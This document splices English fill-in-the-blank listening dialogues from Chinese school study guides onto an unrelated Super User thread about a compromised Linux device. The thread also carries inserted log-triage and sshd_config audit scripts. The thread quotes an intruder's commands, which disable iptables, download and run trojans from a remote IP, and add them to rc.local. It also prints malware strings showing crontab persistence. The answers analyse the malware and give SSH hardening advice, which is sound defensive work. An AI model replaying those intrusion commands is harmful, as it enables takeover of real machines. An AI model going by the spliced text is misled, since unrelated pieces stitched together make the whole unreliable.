Subject: Senior high school English
Source: Compulsory Book 1 English study guide (Foreign Language Teaching and Research Press edition)
M:We had a(1)r_______ interesting debate in the science class today.
W:Really? What was it(2)a________?
M:Space exploration.Should we continue to(3)r________ or spend the money on what’s important to human beings? We had a heated discussion.
W:Well, I think it’s important to find out about the rest of the universe which is(4)u________ even for human beings.It is great and difficult work.
M:But are we wasting money that could be(5)s________ on medical research and saving lives? Medical research is very important.
W:I see what you are saying, but we need to(6)u________ the universe and how it works.I think much about it is(7)p________ to all of us.
M:But why? We live on the earth.As long as we know how earth works…
W:Let me ask you something.Wouldn’t you like to travel into space or(8)v________ the moon?
M:Oh, yes, it would be(9)w________!
W:Well, exactly.Maybe in the future it’ll be(10)p_______ to do that.
Subject: Senior high school English
Source: Elective Book 7 English study guide (Yilin Press edition)
M:Hello! How are you today? I heard you were not y  1   last week.
W:I’m m  2   better now thank you!
M:What was the matter? N  3   serious I hope
W:Oh! No, I had a bad cold and had to stay in bed for two days.
M:I hope it was the last cold of winter and not the first cold of summer.What about your friend Ann? I heard she was ill too.
W:She was ill but now she’s all right.I think she c  4   a cold.
M:Everybody seems to have one now.I guess it’s because of the sudden c  5   of weather, one day hot and the next day cold.
W:And very windy too.That’s why I’m wearing a s  6   today.What do you think of?
M:It certainly looks w  7  .It must have cost a lot.Where did you buy it?
W:Oh! I got it at a sale.It was quite cheap.
M:Really! Well, Mary, I must say it s  8   you well.What a p  9  ! I can’t get one for my wife.
W:Why not? Maybe I can help you find one for your wife some day.
M:Thanks a lot.I’m really thinking of s  10   her a present.
Subject: Senior high school English
M: Well, Stella? Why do you look (44) u_________?
W: Oh, Bill, I have just had a quarrel with Mr. Philips.
M: Mr. Philips! What on earth was it (45)
W: Well, I have made three bad (46) m_____ so far this week. Today I (47) f_________ to give him an important message, so he got really angry with me.
M: But I don’t understand. You are usually very careful and (48) n_____ make mistakes.
W: I’m just so tired, I don’t know (49) w______ I am doing.
M: Why? Have you been going to bed late these days?
W: No, I’m usually in bed by about eleven. But I keep being (50) w______ up by half past four every morning. And then I cannot go back to sleep.
W: It’s my (51) n_____, the milkman next door. He has to get up at half past four and he always turns the radio on (52) l_____.
M: Ask him to turn it down then.
W: It’s difficult. I don’t know him yet.
M: If you don’t want to see him, write him a letter.
W: Do you think it’s a good idea?
M: Yes, I do. I’ll help you (53) w______ the letter.
W: OK, let’s try.
(44) ________
(45) ________
(46) ________
(47) ________
(48) ________
(49) _______
(50) _______
(51) ________
(52) ________
(53) _______
linux - Did I just get hacked? - Super User
I am developing a consumer product, and it is supposed to be connected to the Internet, so as expected, it is connected to the Internet so that I can properly develop it.
I went away for an hour or two, and when I came back to my office I noticed some strange commands written in the terminal.
Looking at the Linux log file called auth.log I can see the following lines (amongst many more):
1 10:45:10 debian-armhf sshd[994]: pam_unix(sshd:auth): au logname= uid=0 euid=0 tty=ssh ruser= rhost=40.127.205.162
1 10:45:12 debian-armhf sshd[994]: Failed password for root from 40.127.205.162 port 37198 ssh2
1 10:45:12 debian-armhf sshd[994]: Received disconnect from 40.127.205.162: 11: Bye Bye [preauth]
The IP address 40.127.205.162 turns out to be .
Here are a bunch of commands that were used while I was away:
service iptables stop
wget http://222.186.30.209:65534/yjz1
chmod 0755 /tmp/yjz1
nohup /tmp/yjz1 > /dev/null 2>&1 &
chmod 777 yjz1
chmod 0755 /tmp/yjz1
nohup /tmp/yjz1 > /dev/null 2>&1 &
chmod 0777 yjz1
chmod u+x yjz1
chmod u+x yjz1
wget http://222.186.30.209:65534/yjz
chmod 0755 /tmp/yjz
nohup /tmp/yjz > /dev/null 2>&1 &
chmod 777 yjz
chmod 0755 /tmp/yjz
nohup /tmp/yjz > /dev/null 2>&1 &
chmod u+x yjz
chmod u+x yjz
/tmp/">>/etc/rc.local
service iptables stop
wget http://222.186.30.209:65534/yjz1
chmod 0755 /tmp/yjz1
nohup /tmp/yjz1 > /dev/null 2>&1 &
chmod 777 yjz1
chmod 0755 /tmp/yjz1
nohup /tmp/yjz1 > /dev/null 2>&1 &
chmod u+x yjz1
chmod 0777 yjz1
/tmp/">>/etc/rc.local
service iptables stop
wget http://222.186.30.209:65534/yjz1
chmod 0755 /root/yjz1
nohup /root/yjz1 > /dev/null 2>&1 &
chmod 777 yjz1
chmod 0755 /root/yjz1
nohup /root/yjz1 > /dev/null 2>&1 &
chmod u+x yjz1
chmod 0777 yjz1
/root/">>/etc/rc.local
service iptables stop
wget http://222.186.30.209:65534/yjz1
chmod 0755 /tmp/yjz1
nohup /tmp/yjz1 > /dev/null 2>&1 &
chmod 777 yjz1
echo "cd /root/">>/etc/rc.local
echo "./yjz1&">>/etc/rc.local
echo "./yjz1&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
service iptables stop
wget http://222.186.30.209:65534/yjz1
chmod 0755 /tmp/yjz1
nohup /tmp/yjz1 > /dev/null 2>&1 &
chmod 777 yjz1
echo "cd /root/">>/etc/rc.local
echo "./yjz1&">>/etc/rc.local
echo "./yjz1&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
service iptables stop
wget http://222.186.30.209:65534/yjz1
chmod 0755 /tmp/yjz1
nohup /tmp/yjz1 > /dev/null 2>&1 &
chmod 777 yjz1
echo "cd /root/">>/etc/rc.local
echo "./yjz1&">>/etc/rc.local
echo "./yjz1&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
service iptables stop
wget http://222.186.30.209:65534/yjz1
chmod 0755 /root/yjz1
nohup /root/yjz1 > /dev/null 2>&1 &
chmod 777 yjz1
chmod 0755 /root/yjz1
nohup /root/yjz1 > /dev/null 2>&1 &
chmod 0777 yjz1
chmod u+x yjz1
chmod u+x yjz1
service iptables stop
wget http://222.186.30.209:65534/yjz1
chmod 0755 /root/yjz1
nohup /root/yjz1 > /dev/null 2>&1 &
chmod 777 yjz1
chmod 0755 /root/yjz1
nohup /root/yjz1 > /dev/null 2>&1 &
chmod 0777 yjz1
chmod u+x yjz1
chmod u+x yjz1
service iptables stop
wget http://175.102.133.55:2/yjz
./yd_cd/make
service iptables stop
service iptables stop
wget http://222.186.30.209:65534/yjz1
I was completely unaware of this. How can I secure my product properly?
I would like to post the complete auth.log file. How do I do that?
Also, the file yjz1 that was downloaded seems to be a Linux Trojan, and all of this seems to be done by some kind of hacker group according to
Should I call Microsoft and talk to them?
What should I do?
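An added example, not part of the question or of any answer in this thread: a small POSIX shell/awk triage of the sshd entries in auth.log, of which the question shows only three lines. It counts, per source address, how many password attempts failed and how many logins were accepted, and flags hosts that did both, which is the pattern to look for when asking whether a brute-force eventually got in. The log lines are constructed for the demonstration; the attacker address is the one quoted in the question, and 203.0.113.7 is a placeholder standing in for the administrator's own workstation.

```shell
#!/bin/sh
# Added example: per-host summary of sshd login outcomes from auth.log lines.
# Not part of the Super User thread. Assumes the stock OpenSSH log wording
# ("Failed password for ... from IP", "Accepted password|publickey for ... from IP").

# Constructed sample log. 40.127.205.162 is the address quoted in the question;
# 203.0.113.7 (TEST-NET-3, a placeholder) stands in for the admin's workstation.
SAMPLE_LOG='Jun  1 10:45:10 debian-armhf sshd[994]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=40.127.205.162  user=root
Jun  1 10:45:12 debian-armhf sshd[994]: Failed password for root from 40.127.205.162 port 37198 ssh2
Jun  1 10:45:12 debian-armhf sshd[994]: Received disconnect from 40.127.205.162: 11: Bye Bye [preauth]
Jun  1 10:45:15 debian-armhf sshd[997]: Failed password for root from 40.127.205.162 port 37301 ssh2
Jun  1 10:45:19 debian-armhf sshd[999]: Accepted password for root from 40.127.205.162 port 37402 ssh2
Jun  1 10:45:19 debian-armhf sshd[999]: pam_unix(sshd:session): session opened for user root by (uid=0)
Jun  1 11:02:03 debian-armhf sshd[1042]: Accepted publickey for dev from 203.0.113.7 port 51022 ssh2'

# Reads auth.log lines on stdin and prints one line per source address:
#   <ip> failed=<n> accepted=<n> [SUSPECT]
# SUSPECT marks a host that both failed and was later accepted: the signature
# of a password guesser that eventually succeeded. "Received disconnect" and
# pam_unix lines are deliberately ignored; they carry no outcome of their own.
ssh_login_summary() {
    awk '
    /sshd\[[0-9]+]: Failed password for / {
        for (i = 1; i <= NF; i++) if ($i == "from") { failed[$(i + 1)]++; seen[$(i + 1)] = 1; break }
    }
    /sshd\[[0-9]+]: Accepted (password|publickey) for / {
        for (i = 1; i <= NF; i++) if ($i == "from") { accepted[$(i + 1)]++; seen[$(i + 1)] = 1; break }
    }
    END {
        for (ip in seen) {
            flag = (failed[ip] + 0 > 0 && accepted[ip] + 0 > 0) ? " SUSPECT" : ""
            printf "%s failed=%d accepted=%d%s\n", ip, failed[ip] + 0, accepted[ip] + 0, flag
        }
    }' | sort
}

# Only the addresses worth investigating further (or handing to fail2ban/iptables).
suspect_ips() {
    ssh_login_summary | awk '/ SUSPECT$/ { print $1 }'
}

# Stand-alone demo on the constructed log; on a real host use: ssh_login_summary < /var/log/auth.log
printf '%s\n' "$SAMPLE_LOG" | ssh_login_summary
```

A host that only ever fails is noise; a host that fails and is then accepted is the one whose session, like the recorded one above, needs to be reconstructed.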
There is one good reason why this post is attracting so much attention: you managed to record the whole, live session of an intruder on your PC. This is very different from our everyday experience, where we deal with the discovery of the consequences of his actions and try to redress them. Here we see him at work, see him having some problems with establishing the backdoor, retrace his steps, work feverishly (perhaps because he was sitting at your desk, as suggested above, or perhaps, and in my opinion more likely, because he was unable to make his malware run on the system, read below), and try to deploy fully self-contained instruments of control.
This is what security researchers witness daily with their honey traps. For me, this is a very rare chance, and the source of some amusement.
You have definitely been hacked. The evidence for this does not come from the snippet of the auth.log file you displayed, because this reports an unsuccessful login attempt, occurring over a short time span (two secs). You will notice that the second line states Failed password, while the third one reports a pre-auth disconnect: the guy tried and failed.
The evidence comes instead from the content of the two files http://222.186.30.209:65534/yjz and http://222.186.30.209:65534/yjz1 which the attacker downloaded onto your system.
The site is currently open to anyone to download them, which I did. I first ran file on them, which showed:
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Then I brought them onto a 64-bit Debian VM; an examination of their content through the strings command revealed much that was suspicious (references to various well-known attacks, to commands to be substituted for, a script that was clearly used to set up a new service, and so on).
I then produced the MD5 hashes of both files, and fed them to Cymru's hash database to see whether they are known agents of malware. While yjz is not, yjz1 is, and Cymru reports a probability of detection by anti-virus software of 58%. It also states that this file was last seen some three days ago, so it is reasonably recent.
Running clamscan (part of the clamav package) on the two files, I obtained:
$ clamscan y*
yjz: Linux.Backdoor.Gates FOUND
yjz1: Linux.Trojan.Xorddos FOUND
so we are now certain that standard Linux software can identify it.
What should you do?
Though rather new, neither system is very new, for instance. So most free packages should be able to remove it. You should try: clamav, rkhunter, chkrootkit. I have Googled around and seen that they claim to be able to spot it. Use them to check on the predecessor's work, but after running these three programs you should be ready to go.
As for the larger question, what should you do to prevent future infections, Journeyman's answer is a good first step. Just keep in mind that it is an ongoing struggle, one that all of us (including me!) may very well have lost without even knowing it.
At Viktor Toth's (indirect) prompt, I would like to add a few comments. It is certainly true that the intruder encountered some difficulties: he downloads two distinct hacking tools, changes their permissions several times, restarts them several times, and tries many times to disable the firewall. It is easy to guess what is happening: he expects his hacking tools to open a communication channel toward one of his infected pcs (see later), and, when he does not see this new channel spring up on his control GUI, fears his hacking tool is being blocked by the firewall, so he repeats the installation procedure. I agree with Viktor Toth that this particular stage of his operation does not seem to bring the expected fruits, but I would like to encourage you very strongly not to underestimate the extent of the damage inflicted on your pc.
I provide here a partial output of strings yjz1:
etc/init.d/%s
/etc/rc%d.d/S90%s
update-rc.d
/etc/cron.hourly/gcc4.sh
/etc/rc.d/rc%d.d/S90%s
/proc/%d/exe
/proc/self/exe
MYSQL_HISTFILE=/dev/null
# chkconfig:
# description: %s
### BEGIN INIT INFO
# Provides:
# Required-Start:
# Required-Stop:
# Default-Start:
# Default-Stop:
# Short-Description:
### END INIT INFO
case $1 in
sed -i '/\/etc\/cron.hourly\/gcc4.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc4.sh' >> /etc/crontab
etc/init.d/%s
GET %s HTTP/1.1
%sHost: %s
POST %s HTTP/1.1
%sHost: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 ( MSIE 6.0; Windows NT 5.2; SV1; TencentT .NET CLR 1.1.4322)
Connection: Keep-Alive
This provides evidence of tampering with the services (in /etc/init.d and in /etc/rc.d), with crontab, with the history file of mysql, and a couple of files in proc which are links to bash (which suggests a custom-made fraudulent version of your shell has been planted). Then the program generates an HTTP request (to a Chinese-speaking site, Accept-Language: zh-cn, which gives substance to David Schwartz's comment above), which may create even more havoc. In the request, binaries (Content-Type: application/x-www-form-urlencoded) are to be downloaded to the attacked pc (GET) and uploaded to the controlling machine (POST). I could not establish what would be downloaded to the attacked pc, but, given the small size of both yjz and yjz1 (1.1MB and 600kB, respectively), I can venture to surmise that most of the files needed to cloak the rootkit, i.e. the altered versions of ls, netstat, ps, ifconfig,..., would be downloaded this way. And this would explain the attacker's feverish attempts to get this download going.
There is no certainty that the above exhausts all possibilities: we certainly lack part of the transcript (between lines 457 and 481), and furthermore, especially worrisome are lines 495-497,
./yd_cd/make
which refer to a file we did not see downloaded, and which might be a compilation: if so, it means the attacker has (finally?) understood what the problem with his executables was, and is trying to fix it, in which case the attacked pc has gone for good. [In fact, the two versions of the malware which the attacker downloaded onto the hacked machine (and I onto my 64bit Debian VM) are for an unsuitable architecture, x86, while the name alone of the hacked-into pc gives away the fact that he was dealing with an arm architecture].
The reason why I wrote this edit is to urge you as strongly as possible either to comb your system with a professional instrument, or to re-install from scratch.
And, by the way, should this prove useful to anyone, this is the list of the 331 IP addresses to which yjz tries to connect. This list is so large (and probably destined to become larger still) that I believe this is the reason for tampering with mysql. The list provided by the other backdoor is identical, which, I presume, is the reason for leaving such an important piece of information out in the open (I think the attacker did not wish to make the effort to store them in kernel format, so he put the whole list in a clear-text file, which is probably read in by all of his backdoors, for whichever OS):
The following code
#!/bin/bash
# filename holds the list above, one IP address per line
echo 0 > out
while read i; do
    whois $i | grep -m 1 -i country >> out
done < filename
cat out | grep -i cn | wc -l
on the above list shows that 302 out of a total of 331 addresses are in mainland China; the remaining ones are in Hong Kong, Mongolia and Taiwan. This adds further support to David Schwartz's contention that this is mostly a Chinese bot ring.
At @vaid's request (the author of the OP, read his comment below), I will add a comment about how to strengthen security of a basic Linux system (for a system providing many services, this is a far more complex topic). vaid states he did the following:
Reinstall the system
changed root password to a 16 character long password with mixed lower- and uppercase letters and characters and digits.
Changed the username to a 6 mixed character long username and applied the same password as used for root
changed SSH port to something above 5000
turned off SSH root login.
This is fine (except I use a port above 10,000 since many useful programs use the ports below 10,000). But I cannot emphasize enough the need to use cryptographic keys for ssh login, instead of passwords. I will give you a personal example. On one of my VPSes, I was uncertain whether to change the port, so I left it at 22, but used crypto keys for authentication. I had hundreds of break-in attempts per day, none succeeded. When, tired of checking daily that no one had succeeded, I eventually switched the port to something above 10,000, break-in attempts went to zero. Mind you, it is not that hackers are stupid (they are not!), they just hunt down easier prey.
It is easy to activate a crypto key with RSA as a signature algorithm; see the comment below by Jan Hudec (thanks!):
mkdir .ssh; chmod 700 .ssh; cd .ssh; ssh-keygen -t rsa (then hit ENTER three times); cat id_rsa.pub >> authorized_keys; chmod 600 *
Now all you have to do is to copy the file id_rsa to the machine from which you want to connect (in a directory .ssh, also chmod'ed to 700), then issue the command
ssh -p YourChosenNonStandardPort -i ~/.ssh/id_rsa me@RemoteMachine
When you are sure that this works, edit on the server (=the machine you want to connect to) the file /etc/ssh/sshd_config, and change the line
#PasswordAuthentication yes
to
PasswordAuthentication no
and restart the ssh service (service ssh restart or systemctl restart ssh, or something like this, depending on distro).
This will withstand a lot. In fact, there are currently no known exploits against the current versions of openssh v2, and of RSA as employed by openssh v2.
Lastly, in order to really bolt down your machine, you will need to configure the firewall (netfilter/iptables) as follows:
iptables -A INPUT -p tcp --dport YourChosenNonStandardPort -j ACCEPT
iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -P INPUT DROP
iptables -P OUTPUT ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
This, 1) allows ssh connections from both LAN and WAN, 2) allows all input which was originated by your requests (for instance, when you load a Web page), 3) drops everything else on the input, 4) allows everything on the output, and 5-6) allows everything on the loopback interface.
As your needs grow, and more ports need to be opened, you may do so by adding, at the top of the list, rules like:
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
to allow for instance people to access your Web browser.
Welcome to the Internet - where any open SSH server is likely going to get probed, brute-forced, and have various indignities inflicted upon it.
To start, you need to completely wipe the storage on the product. Image it if you want to pass it on for forensics, but the Linux install on it is now suspect.
Bit of guesswork but
You got brute-forced or use a common password. It's security by obscurity but you don't want a dictionary password or to use a root account open to SSH. Disable root SSH access if it's an option or at least change the name so they need to guess both. SSHing as root is terrible security practice anyhow. If you must use root, log in as another user and use su or sudo to switch.
Depending on the product, you might want to lock down SSH access in some way. A total lock-down sounds like a good idea, and allows users to open it up as needed. Depending on what resources you can spare, consider only allowing IP addresses in your own subnet, or some kind of login throttling system. If you don't need it on the final product make sure it's turned off.
Use a non standard port. Security by obscurity again, but it means an attacker needs to target your port.
Do not ever use a default password. The best approach I've seen is to randomly generate a password for a specific device and ship it with your product.
Best practice is key based authentication, but I've no idea how you'd approach that on a mass market product.
Oh, you have been definitely hacked. Someone appears to have been able to gain root credentials and attempted to download a Trojan to your system. MariusMatutiae provided an analysis of the payload.
Two questions arise: a) Was the attacker successful? And b) what can you do about it?
The answer to the first question may be a no. Notice how the attacker repeatedly tries to download and run the payload, apparently without success. I suspect that something (SELinux, perchance?) stood in his way.
HOWEVER: The attacker also altered your /etc/rc.d/rc.local file, in the hope that when you restart your system, the payload will be activated. If you have not yet restarted the system, don't restart until you have removed these alterations from /etc/rc.d/rc.local. If you have already restarted it... well, tough luck.
As to what you can do about it: The safest thing to do is to wipe the system and reinstall from scratch. But this may not always be an option. A significantly less safe thing to do is to analyze exactly what happened and wipe every trace of it, if you can. Again, if you have not yet restarted the system, perhaps all it takes is clean /etc/rc.d/rc.local, remove anything downloaded by the attacker, and last but not least, change the darn password!
However, if the attacker was already able to run the payload, there may be other modifications to your system that may be difficult to detect. Which is why a complete wipe is really the only safe (and recommended) option. As you indicated, the equipment in question may be a test/development target so perhaps wiping it is not as painful as it may be in other cases.
Update: Notwithstanding what I wrote about a possible recovery, I wish to echo MariusMatutiae's very strong recommendation not to underestimate the potential damage caused by this payload and the extent to which it may have compromised the target system.
My sshd-honeypot has also seen this kind of attack. First downloads from that URL started at 10:25:33 and attacks are still ongoing.
Attacks are/were coming from
103.30.4.212
111.68.6.170
118.193.228.169
Input from these attackers was:
service iptables stop
wget http://222.186.30.209:65534/yjz1
nohup /root/yjz1 > /dev/null 2>&1 &
chmod 0777 yjz1
chmod u+x yjz1
chmod u+x yjz1
So no activities other than installing the backdoor for later on.
Is debian-armhf your host name? Or do you use a default install with default settings? There is no problem with that, but not for a host directly on the Internet (e.g. not protected by, at least, your modem).
It looks like the real trouble is coming from 222.186.30.209; do not pay heed to Microsoft's IP, an IP can be faked more or less easily.
The usual way to connect to the Internet is to forward a known list of ports from your public IP (say 8.8.8.8) to your local one (192.168.1.12).
For instance, do not forward all incoming connections to 8.8.8.8 (public) to 192.168.1.12 (local).
Forward 25 and 22 (incoming mail and ssh) only; you would of course need to be up to date with the ssh library and the smtp library as well.
What next? Disconnect the host, change any passwords (on other computers of the organisation) that are hard-coded in shell scripts (shame on you!), or in /etc/shadow.
Everyone here has offered solid advice, but to be clear, your priorities should be backing up and verifying what you truly need from that system, then wiping it with a fresh install from known-safe media.
Before you connect your newly installed host to the Internet, run through these ideas:
Create a new non-root user, and log in as that user. You should never need to login as root, just sudo (substitute user do) when needed.
Install SE Linux, configuration settings that enable mandatory access control:
Consider a hardware firewall between your office/home and the Internet. I use MikroTik, which has excellent community support.
Assuming you are on a timeline for completing your paid work, at least do #1. #3 is fast, and cheap, but you'll either need to wait on the package in the mail, or drive to the store.
As others stated, it's pretty clear the security of your server has been compromised. The safest thing is to wipe this machine and re-install.
To answer the second part of your question, if you can't use public key auth, I recommend at least setting up Fail2Ban and running SSH on a non-standard port. I also disable root SSH access.
Fail2Ban will help mitigate brute-force attacks by banning IP addresses that fail to log in a certain number of times.
Setting sshd to listen on a non-standard port will at least help reduce the visibility of your SSH server a tiny bit. Disabling root logon also reduces the attack profile slightly. In /etc/sshd_config:
PermitRootLogin no
Port xxxxx
With root login disabled you will need to either switch to root with su once you've connected, or (more preferably) use sudo to execute privileged commands.
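To make the configuration points above concrete (the PasswordAuthentication change in MariusMatutiae's answer and the PermitRootLogin/Port lines in this one), here is an added shell/awk audit that is not code from either answer: it reads an sshd_config and reports the effective value of those three settings. It applies a rule that is easy to get wrong when editing by hand: sshd keeps the first value it reads for a keyword and ignores later ones, and a Match block ends the global section, so appending "PasswordAuthentication no" below an existing "yes" changes nothing. The sample configs are constructed, and port 21387 is an arbitrary choice.

```shell
#!/bin/sh
# Added example (not from the thread): audit the three sshd_config settings the
# answers above ask for. Reads a config on stdin and prints one PASS/FAIL/WARN
# line per setting. Assumes the "Keyword value" form (whitespace separated),
# which is the form used in the thread's snippets.
audit_sshd_config() {
    awk '
    # Comments and blank lines carry no setting. In particular the stock
    # "#PasswordAuthentication yes" line leaves the default (yes) in force.
    /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
    # A Match block ends the global section; its settings are conditional.
    tolower($1) == "match" { exit }
    # sshd keeps the FIRST value it reads for a keyword, so only record unseen keys.
    {
        key = tolower($1)
        if (!(key in val)) val[key] = $2
    }
    END {
        pa   = ("passwordauthentication" in val) ? val["passwordauthentication"] : "yes (default)"
        prl  = ("permitrootlogin" in val) ? val["permitrootlogin"] : "unset (distro default)"
        port = ("port" in val) ? val["port"] : "22 (default)"
        status = (tolower(pa) == "no") ? "PASS" : "FAIL"
        print status " PasswordAuthentication=" pa
        status = (tolower(prl) == "no") ? "PASS" : "FAIL"
        print status " PermitRootLogin=" prl
        status = (port + 0 != 22 && port + 0 > 0) ? "PASS" : "WARN"
        print status " Port=" port
    }'
}

# Number of FAIL findings; 0 means the config matches the thread's recommendations.
count_fails() {
    audit_sshd_config | awk '/^FAIL/ { n++ } END { print n + 0 }'
}

# Constructed sample 1: looks like a stock Debian file, root login enabled.
WEAK_CONFIG='# constructed sample
Port 22
#PasswordAuthentication yes
PermitRootLogin yes'

# Constructed sample 2: the hardening from the answers, plus a Match block that
# re-enables passwords for one account only (correctly ignored by the global audit).
HARDENED_CONFIG='Port 21387
PermitRootLogin no
PasswordAuthentication no
Match User backup
    PasswordAuthentication yes'

# Constructed sample 3: the ordering trap. The "no" line was appended below the
# existing "yes", so sshd still accepts passwords.
ORDER_TRAP_CONFIG='PasswordAuthentication yes
PermitRootLogin no
PasswordAuthentication no'

# Stand-alone demo; on a real host use: audit_sshd_config < /etc/ssh/sshd_config
echo "== weak";       printf '%s\n' "$WEAK_CONFIG" | audit_sshd_config
echo "== hardened";   printf '%s\n' "$HARDENED_CONFIG" | audit_sshd_config
echo "== order trap"; printf '%s\n' "$ORDER_TRAP_CONFIG" | audit_sshd_config
```

After editing, `sshd -T` on the server prints the effective values sshd itself computed and is the final word; this audit is a quick pre-check that catches the commented-out and out-of-order cases before a restart.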
SSH servers are constantly under attack on the internet. A couple of things you do:
Make sure you use a very secure random password, for internet accessible machines. I mean like 16 characters or more and completely random. Use a password manager so you don't have to memorize it. If you can memorize your password, it's too simple.
If you don't need SSH, turn it off. If you do need it, but don't need it publicly accessible, run it on a high, non-standard port number. Doing this will dramatically reduce hack attempts. Yes a dedicated hacker can do a port scan, but automated bots won't find it.
The snippet from your auth log shows a failed attempt. However if you look further you'll no doubt see a successful login. If you use a simple password, then it's trivial for a bot to get in.
You need to isolate this machine from the network. Very carefully get what you need off it, and then wipe it.
The first thing anyone/everyone should do after setting up a front-facing Linux/Unix server is to immediately disable root.
Your system was compromised. You have a running history log which might be cool to look at to an extent. But honestly dissecting the specifics is a bit nit-picky and won’t help you secure your server. It shows all kinds of nonsense that happens when botnet spawned malware—which is most likely what infected your server—infects a Linux system. The
is nice and well thought out and there are others who repeat that you were hacked via root access which is a malware/botnet’s wet dream.
There are a few explanations on how to disable root, but I will state from personal experience that most anything that goes beyond what I will describe right now is overkill. This is what you should have done when you first set up the server:
Create a new user with sudo rights: Create a new user with a new name—something like cooldude—using a command like sudo adduser cooldude if you are using Ubuntu or another type of Debian system. Then just manually edit the sudo file using a command like this sudo nano /etc/sudoers and add a line like cooldude ALL=(ALL:ALL) ALL beneath the equivalent line that should read root ALL=(ALL:ALL) ALL. With that done, login as cooldude and test the sudo command with a command like sudo w—something basic and non-destructive—to see if the sudo rights work. You might be prompted for a password. That works? All good! Move onto the next step.
Lock the root account: Okay, now that cooldude is in charge with sudo rights, login as cooldude and run this command to lock the root account: sudo passwd -l root. If somehow you have created an SSH key pair for root, open up /root/.ssh/authorized_keys and remove the keys. Or better yet, just rename that file authorized_keys_OFF like this, sudo mv /root/.ssh/authorized_keys /root/.ssh/authorized_keys_OFF, to effectively disable the SSH keys. I prefer the latter because on the off chance you still need passwordless login, you can just move that file back to the original name and you should be good to go.
FWIW, I have managed dozens of Linux servers over the years (decades?) and know from experience that simply disabling root—and setting up a new user with sudo rights—is the simplest and most basic way to secure any Linux system. I’ve never had to deal with any type of compromise via SSH once root is disabled. And yes, you might see attempts to login via the auth.log but if root is disabled then those attempts will never add up to anything. Just sit back and watch the attempts endlessly fail!